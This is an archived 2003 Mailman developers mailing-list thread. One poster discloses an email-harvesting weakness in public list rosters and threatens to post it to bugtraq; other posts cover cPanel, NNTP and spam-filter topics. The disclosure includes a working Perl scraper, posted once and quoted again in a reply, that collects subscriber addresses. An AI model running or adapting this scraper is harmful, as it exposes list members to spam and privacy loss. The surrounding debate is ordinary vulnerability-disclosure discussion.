warning: email address harvesting exploit References: <3FB78C1A.5080702@gmx.at> <20031121003627.GJ9121@dust.uchicago.edu> Message-ID: <3FC39580.2020605@gmx.at> David Champion wrote: > * On 2003.11.16, in <3FB78C1A.5080702@gmx.at>, > >>This test may disable users of non graphical web browers or email >>only subscribers to subscribe. > > I've generally found that encoding the address as HTML character > entities works fine. I've had a bait address on my web page for quite > some time, and it's never received any spam. It's readable to text > browsers, it doesn't affect readability with unexpected font sizes, it > takes little computation, and it's trivial to write. > > My address would become: > dgc@uchicago.edu While this approach may work in individual cases it is trivially and quite likely defeatet when the prize is 100,000 mailing lists with 1 to 5 million (!) high quality email addresses. Since your answer is the only one and the problem does not appear to be addressed sufficiently I wrote an example exploit program that finds mailman lists and harvests their email addresses. After about 20 minutes it collected about 30.000 email addresses: http://bksys.at/bernhard/30,000%20email%20addresses.gz The program can be further improved. It can be a little parallelized. It can check a site for further mailing lists (the admin overview has a more complete list than the listinfo overview). And it can be made to subscribe to mailing lists where the member list is only available to the list members. If you think the problem is worth fixing please estimate how long it will take and I will wait a reasonable time for a fix before I post the problem and the exploit code to bugtraq. Otherwise I will post to bugtraq in about 1 week. Here is the exploit code: ------------------------------------------------------------- #!/usr/bin/perl -w $n=0; $u=0; for ($i=0;1;$i+=10) { $#urls=-1; $google=`lynx --dump 'http://www.google.com/search?q=%22Click+here+for+the+list%22+%22batched+in+a+daily+digest%22&start=$i'`; # print $google; @urls=$google=~/cache:.{12}:(.*?)\+%22/g; if ($#urls==-1) {last;} # print join("\n",@urls); # print "\naoeu $#urls\n"; foreach $url (@urls) { $u++; $url=~s*/listinfo/*/roster/*; print "$url...\n"; $roster=`lynx -connect_timeout=10 -dump $url`; # print $roster; @mails=$roster=~/^ +\* \(?\[\d+\](.* at .*?)\)?$/mgo; foreach $mail (@mails) { $mail=~s/ at /@/; print "$mail\n"; $n++; } print "mails=".($#mails+1).", total=$n, url=$u, google=$i\n"; # exit; } #foreach url } #while google ----------------------------------------------------------- Have a nice day, Bernhard -- Webspace; Low end Serverhousing ab 15 e, etc.: http://www.bksys.at Linux Admin/Programmierer: http://bksys.at/bernhard/services.html From barry at python.org Tue Nov 25 13:00:32 2003 From: barry at python.org (Barry Warsaw) Date: Tue Nov 25 13:00:38 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit In-Reply-To: <3FC39580.2020605@gmx.at> References: <3FB78C1A.5080702@gmx.at> <20031121003627.GJ9121@dust.uchicago.edu> <3FC39580.2020605@gmx.at> Message-ID: <1069783232.1069.21.camel@geddy> On Tue, 2003-11-25 at 12:46, Bernhard Kuemel wrote: > If you think the problem is worth fixing please estimate how long > it will take and I will wait a reasonable time for a fix before I > post the problem and the exploit code to bugtraq. Otherwise I > will post to bugtraq in about 1 week. I will try to look at this for Mailman 2.1.4, which I expect sometime between Thanksgiving and New Years. -Barry From dgc at uchicago.edu Tue Nov 25 13:02:50 2003 From: dgc at uchicago.edu (David Champion) Date: Tue Nov 25 13:03:18 2003 Subject: [Mailman-Developers] Re: bugtraq submission warning: email address harvesting exploit In-Reply-To: <3FC39580.2020605@gmx.at> References: <3FB78C1A.5080702@gmx.at> <20031121003627.GJ9121@dust.uchicago.edu> <3FC39580.2020605@gmx.at> Message-ID: <20031125180250.GO9121@dust.uchicago.edu> * On 2003.11.25, in <3FC39580.2020605@gmx.at>, * "Bernhard Kuemel" wrote: > > While this approach may work in individual cases it is trivially > and quite likely defeatet when the prize is 100,000 mailing lists > with 1 to 5 million (!) high quality email addresses. > ... > If you think the problem is worth fixing please estimate how long > it will take and I will wait a reasonable time for a fix before I > post the problem and the exploit code to bugtraq. Otherwise I > will post to bugtraq in about 1 week. You have way too much time on your hands. -- -D. dgc@uchicago.edu University of Chicago > NSIT > VDN > ENSS > ENSA > You are here . . . . . . . always line up dots From darsie at gmx.at Tue Nov 25 13:14:43 2003 From: darsie at gmx.at (Bernhard Kuemel) Date: Tue Nov 25 13:14:48 2003 Subject: [Mailman-Developers] Re: bugtraq submission warning: email address harvesting exploit References: <3FB78C1A.5080702@gmx.at> <20031121003627.GJ9121@dust.uchicago.edu> <3FC39580.2020605@gmx.at> <20031125180250.GO9121@dust.uchicago.edu> Message-ID: <3FC39C13.2010508@gmx.at> David Champion wrote: >>If you think the problem is worth fixing please estimate how long >>it will take and I will wait a reasonable time for a fix before I >>post the problem and the exploit code to bugtraq. Otherwise I >>will post to bugtraq in about 1 week. > > You have way too much time on your hands. You are absolutely right. Anyone has a (paid) (Linux) job for me? Also - sorry for being annoying, but I try to keep the spam down and when the graphical turing test I offered to block email harvesting bots was just turned away I was a little disappointed. Well, maybe I am wrong and this is not really an issue, then sit back and relax. Maybe my contribution will also be rejected from bugtraq. But I feel millions of email addresses are worth a bit more security/privacy. Bernhard -- Webspace; Low end Serverhousing ab 15 e, etc.: http://www.bksys.at Linux Admin/Programmierer: http://bksys.at/bernhard/services.html From r.barrett at openinfo.co.uk Tue Nov 25 13:49:40 2003 From: r.barrett at openinfo.co.uk (Richard Barrett) Date: Tue Nov 25 13:49:55 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit In-Reply-To: <3FC39580.2020605@gmx.at> References: <3FB78C1A.5080702@gmx.at> <20031121003627.GJ9121@dust.uchicago.edu> <3FC39580.2020605@gmx.at> Message-ID: <20276EA2-1F78-11D8-8CA9-000A957C9A50@openinfo.co.uk> On 25 Nov 2003, at 17:46, Bernhard Kuemel wrote: > David Champion wrote: >> * On 2003.11.16, in <3FB78C1A.5080702@gmx.at>, >>> This test may disable users of non graphical web browers or email >>> only subscribers to subscribe. >> I've generally found that encoding the address as HTML character >> entities works fine. I've had a bait address on my web page for quite >> some time, and it's never received any spam. It's readable to text >> browsers, it doesn't affect readability with unexpected font sizes, it >> takes little computation, and it's trivial to write. >> My address would become: >> dgc@uchicago >> .edu > > While this approach may work in individual cases it is trivially and > quite likely defeatet when the prize is 100,000 mailing lists with 1 > to 5 million (!) high quality email addresses. > > Since your answer is the only one and the problem does not appear to > be addressed sufficiently I wrote an example exploit program that > finds mailman lists and harvests their email addresses. After about 20 > minutes it collected about 30.000 email addresses: > http://bksys.at/bernhard/30,000%20email%20addresses.gz > > The program can be further improved. It can be a little parallelized. > It can check a site for further mailing lists (the admin overview has > a more complete list than the listinfo overview). And it can be made > to subscribe to mailing lists where the member list is only available > to the list members. > > If you think the problem is worth fixing please estimate how long it > will take and I will wait a reasonable time for a fix before I post > the problem and the exploit code to bugtraq. Otherwise I will post to > bugtraq in about 1 week. > I am just a spectator but this doesn't look like a major contribution to the Open Source movement by you. As a way of getting your code and ideas adopted it is one hell of an approach. A better approach might be to work up a patch for the current Mailman release that will demonstrably function in practice (how are we going to manage all those images your original "Turing test" proposal will lead to) and submit that like any other contributor. You can program in Perl so using Python should be a snap for a clever fellow like you. But I confess if it were for me to decide on a response to your threats, which it is not, I'd say sex and travel fits the bill. > Here is the exploit code: > > ------------------------------------------------------------- > #!/usr/bin/perl -w > > $n=0; > $u=0; > for ($i=0;1;$i+=10) { > $#urls=-1; > $google=`lynx --dump > 'http://www.google.com/search? > q=%22Click+here+for+the+list%22+%22batched+in+a+daily+digest%22&start=$ > i'`; > # print $google; > @urls=$google=~/cache:.{12}:(.*?)\+%22/g; > if ($#urls==-1) {last;} > # print join("\n",@urls); > # print "\naoeu $#urls\n"; > > foreach $url (@urls) { > $u++; > $url=~s*/listinfo/*/roster/*; > print "$url...\n"; > $roster=`lynx -connect_timeout=10 -dump $url`; > # print $roster; > @mails=$roster=~/^ +\* \(?\[\d+\](.* at .*?)\)?$/mgo; > foreach $mail (@mails) { > $mail=~s/ at /@/; > print "$mail\n"; > $n++; > } > print "mails=".($#mails+1).", total=$n, url=$u, google=$i\n"; > # exit; > } #foreach url > > } #while google > ----------------------------------------------------------- > > Have a nice day, There's irony for you. > Bernhard > > -- > Webspace; Low end Serverhousing ab 15 e, etc.: http://www.bksys.at > Linux Admin/Programmierer: http://bksys.at/bernhard/services.html ----------------------------------------------------------------------- Richard Barrett http://www.openinfo.co.uk From selph at chgr.mc.vanderbilt.edu Tue Nov 25 13:56:17 2003 From: selph at chgr.mc.vanderbilt.edu (Doug Selph) Date: Tue Nov 25 13:56:22 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit In-Reply-To: <3FC39580.2020605@gmx.at> Message-ID: <0CB08353-1F79-11D8-9F07-000393A481EE@chgr.mc.vanderbilt.edu> On Tuesday, Nov 25, 2003, at 11:46 US/Central, Bernhard Kuemel wrote: > If you think the problem is worth fixing please estimate how long it > will take and I will wait a reasonable time for a fix before I post > the problem and the exploit code to bugtraq. Otherwise I will post to > bugtraq in about 1 week. > > Here is the exploit code: It seems, Bernard, that you may as well have posted it to bugtraq immediately, since your posting of the code to this list will likely make the exploit code accessible via a google search for "mailman exploit" within a matter of hours... From barry at python.org Tue Nov 25 14:03:44 2003 From: barry at python.org (Barry Warsaw) Date: Tue Nov 25 14:03:50 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit In-Reply-To: <3FC3A001.5020006@gmx.at> References: <3FB78C1A.5080702@gmx.at> <20031121003627.GJ9121@dust.uchicago.edu> <3FC39580.2020605@gmx.at> <1069783232.1069.21.camel@geddy> <3FC3A001.5020006@gmx.at> Message-ID: <1069787024.1069.25.camel@geddy> On Tue, 2003-11-25 at 13:31, Bernhard Kuemel wrote: > I want to remind you about my graphical turing test I proposed as > solution: > > http://mail.python.org/pipermail/mailman-developers/2003-November/016082.html I'd consider something like that a new feature, and not likely to make it into the maintenance releases. -Barry From chuqui at plaidworks.com Tue Nov 25 14:07:39 2003 From: chuqui at plaidworks.com (Chuq Von Rospach) Date: Tue Nov 25 14:08:13 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit In-Reply-To: <1069787024.1069.25.camel@geddy> References: <3FB78C1A.5080702@gmx.at> <20031121003627.GJ9121@dust.uchicago.edu> <3FC39580.2020605@gmx.at> <1069783232.1069.21.camel@geddy> <3FC3A001.5020006@gmx.at> <1069787024.1069.25.camel@geddy> Message-ID: On Nov 25, 2003, at 11:03 AM, Barry Warsaw wrote: >> I want to remind you about my graphical turing test I proposed as >> solution: >> >> http://mail.python.org/pipermail/mailman-developers/2003-November/ >> 016082.html > > I'd consider something like that a new feature, and not likely to make > it into the maintenance releases. > Fails ADA and accessibility requirements badly. I'd argue against any solution that fails such basic needs without any real way to fix it. Better is to simply teach the archives not to distribute sensitive information at all. And a lot easier to implement, actually. From darsie at gmx.at Tue Nov 25 13:31:29 2003 From: darsie at gmx.at (Bernhard Kuemel) Date: Tue Nov 25 14:11:55 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit References: <3FB78C1A.5080702@gmx.at> <20031121003627.GJ9121@dust.uchicago.edu> <3FC39580.2020605@gmx.at> <1069783232.1069.21.camel@geddy> Message-ID: <3FC3A001.5020006@gmx.at> Barry Warsaw wrote: > On Tue, 2003-11-25 at 12:46, Bernhard Kuemel wrote: > >>If you think the problem is worth fixing please estimate how long >>it will take and I will wait a reasonable time for a fix before I >>post the problem and the exploit code to bugtraq. Otherwise I >>will post to bugtraq in about 1 week. > > I will try to look at this for Mailman 2.1.4, which I expect sometime > between Thanksgiving and New Years. Thank you. I'd appreciate being informed about the progress. I want to remind you about my graphical turing test I proposed as solution: http://mail.python.org/pipermail/mailman-developers/2003-November/016082.html Bernhard -- Webspace; Low end Serverhousing ab 15 e, etc.: http://www.bksys.at Linux Admin/Programmierer: http://bksys.at/bernhard/services.html From businskyc at BATTELLE.ORG Fri Nov 21 16:26:52 2003 From: businskyc at BATTELLE.ORG (chris businsky) Date: Tue Nov 25 14:12:16 2003 Subject: [Mailman-Developers] MailMan Message-ID: <6C50BCFA-1C69-11D8-BD08-000A9567462C@battelle.org> I am in the process of adding one of your mailman mailing lists to my site and so far it works great, but I was wondering if there was a way I could just add a box for persons to enter their email address in to subscribe? If so can you point me to the correct document for doing so. Thanks. Chris w: 410-306-8525 f: 410-306-8422 From vg at us.ibm.com Mon Nov 24 12:07:07 2003 From: vg at us.ibm.com (Vikas Gupta) Date: Tue Nov 25 14:12:40 2003 Subject: [Mailman-Developers] Forbidden....Help needed Message-ID: Hi, I have just installed mailman 2.1.3 and python 2.3.2 and also configured the settings. Now when i start the apache server and try to view the mailman list page on the browser, I get the following error : Forbidden: Ypou don't have permissions to access /mailman/admin/test. Any idea what is it...what kind of security settings are required...please advice Vikas From r.barrett at openinfo.co.uk Tue Nov 25 16:51:09 2003 From: r.barrett at openinfo.co.uk (Richard Barrett) Date: Tue Nov 25 16:51:32 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit In-Reply-To: <3FC3B653.9060608@gmx.at> References: <3FB78C1A.5080702@gmx.at> <20031121003627.GJ9121@dust.uchicago.edu> <3FC39580.2020605@gmx.at> <20276EA2-1F78-11D8-8CA9-000A957C9A50@openinfo.co.uk> <3FC3B653.9060608@gmx.at> Message-ID: <7A7514A4-1F91-11D8-8CA9-000A957C9A50@openinfo.co.uk> On 25 Nov 2003, at 20:06, Bernhard Kuemel wrote: > Richard Barrett wrote: >>> Since your answer is the only one and the problem does not appear to >>> be addressed sufficiently I wrote an example exploit program that >>> finds mailman lists and harvests their email addresses. After about >>> 20 minutes it collected about 30.000 email addresses: >>> http://bksys.at/bernhard/30,000%20email%20addresses.gz >> I am just a spectator but this doesn't look like a major contribution >> to the Open Source movement by you. > > You are right. It is a small contribution. I also filed a PHP bug > today. Another small contribution. Makes 2 today. But not all days are > as productive as this one. > >> As a way of getting your code and ideas adopted it is one hell of an >> approach. > > Well, I'm not sure if a graphical turing test makes up for the > drawbacks I mentioned so I'm not sure it will make it to mailman. But > I'm glad that the email harvesting problem get's some attention now. > >> A better approach might be to work up a patch for the current Mailman >> release that will demonstrably function in practice (how are we >> going to manage all those images your original "Turing test" >> proposal will lead to) and submit that like any other contributor. > > It would probably be more efficient if some who are familiar with the > mailman code fixed its "security flaws". Also we first need to find > out what should be done about it. A graphical turing test may rule out > users of non graphical web browsers and maybe we can come up with > something bettter. Implementing it prematurely might be a waste of > human resources. > >> You can program in Perl so using Python should be a snap for a clever >> fellow like you. > > Maybe. However, I don't like python as on our old P60 server it burned > up so much CPU time (15 s/min). It would be interesting to see you present convincing evidence that Python runs slower than Perl which you seem happy to rely on. > I can also program in C so I could probably fix the PHP bug as well. > However, I do not always feel like doing everything, especially if the > others don't like it. Maybe dilettante springs to mind as a description that fits. > >> But I confess if it were for me to decide on a response to your >> threats, > > I was looking for a better word than 'warning', however, none of the > alternatives seemed to fit. Also I tried to make my announcement of my > bugtraq post as little offensive as bugtraq post as little offensive > as possible. If you are a native english speaker maybe you can show me > an even better way. How about acting like a contributor to produce solutions instead of being a smart guy: why just contributes to the pool of problems when you could contribute to the pool of solutions to problems. Why should anybody take your proposals seriously, and invest their unpaid effort into proving their worth, when you cannot be bothered to invest the effort yourself. > >> which it is not, I'd say sex and travel fits the bill. > > Well, well, if you prefer some hints about sex over my bug reports > maybe we should change the forum. About travelling, if you want you > can join next European Rainbow gathering, my every year summer > highlight. See my rainbow website for details: http://rainbow.bksys.at > . > >>> Have a nice day, >> There's irony for you. > > That was not meant ironically. Hmm, maybe 'cheers' would have been > less ambigous, but only '(kind) regards' came to my mind at that time > and that sounded too formal to me. Other suggestions? > > Cheers, Bernhard > > -- > Webspace; Low end Serverhousing ab 15 e, etc.: http://www.bksys.at > Linux Admin/Programmierer: http://bksys.at/bernhard/services.html > From Martin at Cleaver.org Wed Nov 26 01:15:35 2003 From: Martin at Cleaver.org (Martin@Cleaver.org) Date: Wed Nov 26 01:16:05 2003 Subject: Fwd: RE: [Mailman-Developers] RE: [Mailman-Users] Mailman &CPanel? In-Reply-To: <1068954401.2608.12.camel@localhost.localdomain> Message-ID: All, has anyone taken up Nick's kind offer of using these details to get the modification scripts? I am happy to do this but can only post them here once I do so because the code will mean nothing to me. I am sure it is in everyone's interest for this to be working smoothly - given we now have access to any information and a contact point in Nick, I suspect we just need someone to own and drive the process from the mailman side. Who at mailman has good inner workings of the install process and the installation directories? If there is any issue I should be aware of please feel free to contact me in private. Cheers, Martin. -- Martin@Cleaver.org - +1 416 832 7759 Melbourne Business School FT 2004 MBA Exchange Participant to Rotman =-----Original Message----- =From: J. Nick Koston [mailto:nick@cpanel.net] =Sent: November 15, 2003 10:47 PM =To: Martin@Cleaver.org =Cc: barry@python.org; mailman-developers@python.org; bob@nleaudio.com; =serafin@eryxma.com =Subject: Re: Fwd: RE: [Mailman-Developers] RE: [Mailman-Users] Mailman =&CPanel? = =Martin, = =Just use this ip address to submit a ticket: = =216.118.116.101 = =/Nick = =On Sat, 2003-11-15 at 10:29, Martin@Cleaver.org wrote: => Hi Barry, => => It seems this is the key - you need to open a cpanel account => and cpanel needs to treat the Mailman development team as a => "licensed cPanel customer". This will enable you to file support => requests and see the code that cpanel uses to mould mailman to => fit. => => I appreciate the need to register at the cpanel site. It keeps => the signal to noise ratio higher - and approval was quite rapid => for me. => => Note that I cannot request these scripts as I am an end user not => a cpanel registeree. Even if I could, the scripts would not mean => much to me. => => I just want my archives to work!!! => => Best regards and thanks to all, => Martin. => => --- "J. Nick Koston" wrote: > Subject: RE: => [Mailman-Developers] RE: [Mailman-Users] Mailman & => > CPanel? => > From: "J. Nick Koston" => > To: Martin@Cleaver.org => > Date: Sat, 15 Nov 2003 09:54:57 -0500 => > => > You can get a copy of any patches we have applied by supporting => > a ticket => > at http://support.cpanel.net => > => > On Fri, 2003-11-14 at 22:06, Martin@Cleaver.org wrote: => > > Nick, => > > Has Cpanel documented the changes they have made to => > Mailman? If not, can => > > Cpanel supply the Mailman dev team with the scripts they use => > to mould it to => > > fit? => > > Cheers, => > > Martin. => > > -- => > > Martin@Cleaver.org - +1 416 832 7759 => > > Melbourne Business School FT 2004 MBA Exchange Participant to => > Rotman => > > => > > => > > => > > =-----Original Message----- => > > =From: Bob Puff@NLE [mailto:bob@nleaudio.com] => > > =Sent: Friday, 14 November 2003 8:20 PM => > > =To: Martin@Cleaver.org; 'Barry Warsaw' => > > ?: 'J. Nick Koston'; mailman-developers@python.org; => > serafin@eryxma.com => > > =Subject: RE: [Mailman-Developers] RE: [Mailman-Users] => > Mailman & CPanel? => > > => > > => > > =The problem with cpanel is that it messes with the program => > configs in order => > > =to => > > =mould things into its proprietary setup. Once that way, its => > hard to mess => > > =with => > > =things, because they are not as they would normally be set => > up in a standard => > > =install. So in this example, the Mailman install is NOT the => > same as you => > > =would => > > =find on a webhost without cpanel. => > > => > > =Its ok for people who just want to set up a server and let => > their users => > > =modify => > > ?sic stuff, but its not for those who want to install => > custom software, or => > > =tweak stuff. I tried it on a box a while ago, and promptly => > reformatted => > > ?ter => > > =trying to figure out where they moved stuff, etc... => > > => > > =Bob => > > => > > => > > =---------- Original Message ----------- => > > =From: => > > =To: "'Barry Warsaw'" => > > =Sent: Thu, 13 Nov 2003 23:55:32 -0500 => > > =Subject: RE: [Mailman-Developers] RE: [Mailman-Users] => > Mailman & CPanel? => > > => > > => Hi Barry => > > => => > > => Ok, many thanks. Please see below for the full message. => > You'll note => > > => that I'd lost all the text from the message. => > > => => > > => I'll send you the password for the list in a separate => > message. Feel => > > => free to look or change the settings, and to create a new => > list for => > > => testing. All my lists have this problem so I am sure it is => > nothing => > > => that I have done wrong. => > > => => > > => I'm using Outlook XP 2002 SP-2, but my users (including => > Sean who => > > => sent that last message) may be using something different. => > > => => > > => Thanks and regards, => > > => Martin. => > > => => > > => => > > => On Tue, 2003-11-11 at 13:23, Martin@Cleaver.org wrote: => > > => => > > => > Nick / Barry => > > => => > > => > Can you please at least acknowledge whether this is a => > known problem? => > > => => > > => > Many Thanks, => > > => => > > => > Martin. => > > => => > > => > =My main complaint is that the archives don't work with => > HTML postings => > > => => > > => > =rendering the mailing list practically useless. => > > => => > > => > =Here's a typical mailing: => > => > > => http://cp1.myhostdns.org/pipermail/social-announce- => > > => ft2004_mbssrc.com/2003-No vember/date.html => > > => => > > => > => > > => => > > => > =Here's my postings to the cpanel site: => > > => => > > => > = * => > => > > => http://forums.cpanel.net/showthread.php?s=&threadid928 => > > => => > > => > => > > => => > > => > =And I am not alone: => > > => => > > => > = * => > => > > => http://forums.cpanel.net/showthread.php?s=&threadid383 => > > => => > > => I'm sorry I can't get into the cpanel forums. => > > => => > > => But I did look at that Pipermail message (you need to => > follow the => > > => link to the one page that's in that date index). If I => > follow the => > > => link to the GIF image, it shows up just fine. => > > => => > > => Please note that the rendering of messages such as => > > => multipart/alternative are depending on list settings that => > I can't => > > => see, such as which content types to pass or scrub. I also => > haven't => > > => seen the original message so I don't know how what was => > posted => > > => matches against the filter_mime_types and pass_mime_types => > settings => > > => in the Content Filter section. There are also some => > site-wide => > > => settings which describe how to archive things like HTML => > messages, => > > => although I don't think that's what's happening here (it => > looks more => > > => like some unintended content-types are getting scrubbed => > out). => > > => => > > => I can't see any bugs, but your list may not be configured => > the way => > > => you want it for the types of messages being posted to it. => > > => => > > => -Barry => > > => => > > => -- => > > => => > > => Martin@Cleaver.org - +1 416 832 7759 => > > => Melbourne Business School FT 2004 MBA Exchange Participant => > to Rotman => > > => => > > => => > > => => > > => => > > => => > > => -----Original Message----- => > > => From: Sean Xi Yu WEN [mailto:x.wen@student.mbs.edu] => > > => Sent: Wednesday, 5 November 2003 12:22 AM => > > => To: Social-announce-ft2004@mbssrc.com => > > => Cc: Martin@Cleaver.org; Quan Zhang => > > => Subject: [Social-announce-ft2004] East Meets West Lunch => > > => => > > => => > > => => > > => Welcome to the launch of the East Meets West Lunch Club!! => > Our launch => > > => involves a delightful eastern lunch in the city this => > coming Monday, => > > => 10 November. Our aim is to meet monthly for lunch => > alternating => > > => between eastern and western themed restaurants. => > > => => > > => Please join us to explore the city and bridge the cultural => > gap. => > > => => > > => => > > => => > > => Monday's menu is set at $13 per person; => > > => => > > => including Chicken with Special Sauce, Sweet and Sour Pork => > and Beef with => > > => Vegetables, all served with vegetable fried rice. => > > => => > > => => > > => => > > => Save December 5 for our next meeting; location to be => > announced. => > > => => > > => => > > => => > > => Time: 1:30 p.m. => > > => => > > => Date: 10 November 2003 => > > => => > > => Place: Num Fong Chinese Restaurant => > > => => > > => 271 Swanston Street, CBD => > > => => > > => => > > => => > > => => > > => => > > => => > > => => > > => => > > => => > > => - Quan (Calvin) Zhang, Xi Yu (Sean) Wen, => > > => => > > => Mindy Frink and Lisa Stevenson (founding members) => > > => => > > => => > > => => > > => => > > => => > > => RSVP to x.xx => > @student.mbs.edu if => > > => you plan to join. => > > => => > > => See you there! => > > => => > > => => > > => => > > => => > > => => > > => => > > => => > > => => > > => => > > => Sean Xi Yu WEN => > > => => > > => MBA - Class of 2004 => > > => => > > => Melbourne Business School => > > =------- End of Original Message ------- => > > => > > => > > => > => => ==== => -- => Martin@Cleaver.org (please don't reply to @yahoo) => => ______________________________________________________________________ => Post your free ad now! http://personals.yahoo.ca => => From barry at python.org Wed Nov 26 09:23:31 2003 From: barry at python.org (Barry Warsaw) Date: Wed Nov 26 09:23:37 2003 Subject: Fwd: RE: [Mailman-Developers] RE: [Mailman-Users] Mailman &CPanel? In-Reply-To: References: Message-ID: <1069856610.4144.5.camel@anthem> On Wed, 2003-11-26 at 01:15, Martin@Cleaver.org wrote: > All, has anyone taken up Nick's kind offer of using these details to get the > modification scripts? I honestly don't know when I'm going to have time to follow through on this. I'm chasing a few other critical issues right now. If anyone else can lend a hand, it would be appreciated! -Barry From barry at python.org Wed Nov 26 10:23:54 2003 From: barry at python.org (Barry Warsaw) Date: Wed Nov 26 10:24:01 2003 Subject: [Mailman-Developers] Any other NNTP gatewayers out there? SMTP reject bounce processing is broken? Message-ID: <1069860233.4364.40.camel@anthem> Does anybody else gateway messages from NNTP, and specifically Usenet using Mailman 2.1.x? We've been seeing a very weird behavior where python-list (which is gated to and from comp.lang.python) suddenly mass bounce disables every regular delivery member. The triggering bounce messages always come from NNTP, never from email. The problem doesn't appear to affect digest members. There are other clues . Here's what I believe happens: Mailman pulls a message pulled from NNTP, and tries to post it to the list. The message however triggers and Exim acl check such as the one on message header syntax or one of our homegrown virus checks. Exim then rejects the message at SMTP hand-off time. Mailman see that rejection and scores a bounce message for every SMTP recipient. Now, I VERP that list so everybody gets a separate SMTP session, but I see about the number of rejects as the number of non-already-disabled regular delivery members. Exim never rejects a digest containing one of the trigger messages. Any message posted via mail that would hit one of our Exim acls would never even make it to the list, but NNTP pulled messages bypass that front-door check. I think part of the problem is our Exim config, and I'm working with the other python.org postmasters to address that. The other problem is in Mailman's handling of rejections at SMTP time. Currently, it always scores a bounce for any recipients of such a rejected message, and this scoring bypasses the bounce_processing flag. I think this behavior is at least partially broken. One fix would be to never score a bounce if the message was rejected at SMTP time. We could move the message to qfiles/bad and log the rejection but otherwise ignore the scoring. This might be bad because then Mailman wouldn't score bounces for non-existent local users, and because on a VERP'd list, we might get tons of qfiles/bad messages for every gated message. This latter might be manageable. We could just ignore rejections only for messages pulled from NNTP, which should reduce the missing of legitimate scoring for bogus local users, since they'll still get scored for regular email posts. Anybody have any thoughts or comments? I'm probably going to implement the latter to fix the immediate problem. -Barry From brad.knowles at skynet.be Wed Nov 26 12:01:44 2003 From: brad.knowles at skynet.be (Brad Knowles) Date: Wed Nov 26 13:05:01 2003 Subject: [Mailman-Developers] Any other NNTP gatewayers out there? SMTP reject bounce processing is broken? In-Reply-To: <1069860233.4364.40.camel@anthem> References: <1069860233.4364.40.camel@anthem> Message-ID: At 10:23 AM -0500 2003/11/26, Barry Warsaw wrote: > Does anybody else gateway messages from NNTP, and specifically Usenet > using Mailman 2.1.x? I was doing that for comp.protocols.time.ntp for ntp.org (gatewayed to questions@ntp.org). > We've been seeing a very weird behavior where python-list (which is > gated to and from comp.lang.python) suddenly mass bounce disables every > regular delivery member. The triggering bounce messages always come > from NNTP, never from email. The problem doesn't appear to affect > digest members. There are other clues . I imagine this is because digest mode results in stripping out the problematic headers that would cause Exim to barf on the message. Since the digest version of the message is sanitized, the digests get through okay, while the unsanitized version of the message is rejected. > I think part of the problem is our Exim config, and I'm working with the > other python.org postmasters to address that. We were using postfix, not exim. I don't recall running into any problems with the gatewaying which were a result from postfix rejecting messages, however. I do recall reporting problems whereby we tried to set up the list as "closed" (so that only subscribers could post), and mailman made the mistake of applying this action to incoming NNTP messages as well as incoming SMTP messages, resulting in moderation notices being sent to anyone who posted via NNTP from an address that was not subscribed to the list. As such, we were forced to turn off this feature. It would be nice if there was a way to get mailman to apply certain features to messages only coming in via one of these mechanisms. For example, I would still like to apply the anti-spam methods and MIME format stripping methods to messages coming in via both SMTP and NNTP, but I'd like to be able to apply the posting restrictions only to messages coming in via SMTP. -- Brad Knowles, "They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety." -Benjamin Franklin, Historical Review of Pennsylvania. GCS/IT d+(-) s:+(++)>: a C++(+++)$ UMBSHI++++$ P+>++ L+ !E-(---) W+++(--) N+ !w--- O- M++ V PS++(+++) PE- Y+(++) PGP>+++ t+(+++) 5++(+++) X++(+++) R+(+++) tv+(+++) b+(++++) DI+(++++) D+(++) G+(++++) e++>++++ h--- r---(+++)* z(+++) From barry at python.org Wed Nov 26 13:54:34 2003 From: barry at python.org (Barry Warsaw) Date: Wed Nov 26 13:54:41 2003 Subject: [Mailman-Developers] Any other NNTP gatewayers out there? SMTP reject bounce processing is broken? In-Reply-To: References: <1069860233.4364.40.camel@anthem> Message-ID: <1069872873.5058.12.camel@anthem> On Wed, 2003-11-26 at 12:01, Brad Knowles wrote: > > We've been seeing a very weird behavior where python-list (which is > > gated to and from comp.lang.python) suddenly mass bounce disables every > > regular delivery member. The triggering bounce messages always come > > from NNTP, never from email. The problem doesn't appear to affect > > digest members. There are other clues . > > I imagine this is because digest mode results in stripping out > the problematic headers that would cause Exim to barf on the message. > Since the digest version of the message is sanitized, the digests get > through okay, while the unsanitized version of the message is > rejected. Yep. > I do recall reporting problems whereby we tried to set up the > list as "closed" (so that only subscribers could post), and mailman > made the mistake of applying this action to incoming NNTP messages as > well as incoming SMTP messages, resulting in moderation notices being > sent to anyone who posted via NNTP from an address that was not > subscribed to the list. I think that one's been since fixed. None of the Moderation.py checks are done on messages from NNTP. Some of the Hold.py checks are still done (all but the explicit destination check). > As such, we were forced to turn off this feature. It would be > nice if there was a way to get mailman to apply certain features to > messages only coming in via one of these mechanisms. For example, I > would still like to apply the anti-spam methods and MIME format > stripping methods to messages coming in via both SMTP and NNTP, but > I'd like to be able to apply the posting restrictions only to > messages coming in via SMTP. I agree that it would be nice to have more control over which checks are done based on the origin of the message. That's more of a feature request for future versions though. But try it again, because Mailman 2.1.3 should be applying mostly the right checks for gated messages. -Barry From jeffw at chebucto.ns.ca Wed Nov 26 15:33:45 2003 From: jeffw at chebucto.ns.ca (Jeff Warnica) Date: Wed Nov 26 15:32:48 2003 Subject: [Mailman-Developers] GUI hacking for SA integration Message-ID: <1069878824.4190.36.camel@ron> I have a couple of questions. First: If I was to submit a (compleate) set of patches that allow at least some per list configuration for SpamAssassin integration, would they be accepted? As a first attempt I would be just concerned with setting the score, and actions to take. Likely it would be hard coded at 3 possible actions discard, hold for moderation, or pass through, as I cant think that anyone would want to bounce spam. And on doing the actual work: What version should I be working with? CVS or the 2.1 branch? What would be the closest thing that I could clone as a starting point? Topics seems like a possible thing to examin. Also, Im not a Python hacker, though Ive used a lot of different languages. Are there any paticular gotcha's of either Python or Mailman that I should be aware of? Thanks. From PieterB at gewis.nl Thu Nov 27 03:47:23 2003 From: PieterB at gewis.nl (PieterB) Date: Thu Nov 27 03:47:27 2003 Subject: [Mailman-Developers] GUI hacking for SA integration In-Reply-To: 